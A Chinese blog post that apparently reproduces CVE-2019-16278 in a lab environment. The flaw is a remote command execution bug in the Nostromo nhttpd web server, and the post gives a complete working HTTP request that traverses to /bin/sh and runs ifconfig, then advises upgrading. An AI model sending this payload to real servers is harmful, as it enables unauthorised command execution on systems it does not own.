Nostromo 远程命令执行(CVE-2019-16278)复现

本文详细介绍了开源web服务器Nostromo(nhttpd)的CVE-2019-16278漏洞,该漏洞允许远程命令执行。受影响的版本为nhttpd 1.9.6及以下。通过在线环境搭建,展示了利用burp抓包构造注入命令来复现漏洞的过程,其中HTTP请求头必须设置为HTTP/1.0。成功执行命令后,显示了命令执行结果。最后,文章提醒用户通过升级到安全版本来修复此漏洞。
摘要由CSDN通过智能技术生成

Nostromo 远程命令执行(CVE-2019-16278)复现

框架介绍:

Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。

影响版本:

nhttpd:version <= 1.9.6

环境搭建:

这里采用在线环境 地址

漏洞复现:

访问首页

burp抓包,构造注入命令

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Host: vulfocus.fofa.so:34940
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

echo
echo
ifconfig 2>&1

 这里要注意HTTP/1.0必须时1.0

发现命令执行成功

poc地址 

 漏洞修复:

根据官方,升级到安全版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值